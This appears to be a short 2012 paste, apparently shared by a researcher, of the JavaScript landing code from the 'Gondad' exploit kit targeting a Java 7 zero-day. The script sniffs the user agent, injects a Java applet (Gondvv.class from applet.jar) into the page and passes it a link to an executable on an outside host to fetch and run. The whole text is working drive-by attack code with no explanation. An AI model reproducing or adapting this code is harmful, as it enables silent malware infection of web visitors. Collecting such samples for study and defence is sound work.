
Java 7 0day Gondad Exploit Kit
By:
eromang on
Aug 27th, 2012 | syntax:
JavaScript | size: 1.10 KB | hits: 1,152 | expires: Never
var xxx3 = window.navigator.userAgent.toLowerCase();
if (xxx3.indexOf("msie 6") > -1) {
document.write("<OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' width='200' height='200'><param name=xiaomaolv value= 'http://ok.aa24.net/meeting/hi.exe'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '748'><param name=CODE value= 'cve2012xxxx.Gondvv.class'><param name=archive value= 'applet.jar'></OBJECT>");
} else {
document.write("<br>");
var gondady = document.createElement("body");
document.body.appendChild(gondady);
var gondad = document.createElement("applet");
gondad.width = "256";
gondad.height = "256";
gondad.archive = "applet.jar";
gondad.code = "cve2012xxxx.Gondvv.class";
gondad.setAttribute("xiaomaolv", "http://ok.aa24.net/meeting/hi.exe");
gondad.setAttribute("bn", "woyouyizhixiaomaolv");
gondad.setAttribute("si", "conglaiyebuqi");
gondad.setAttribute("bs", "748");
document.body.appendChild(gondad);
}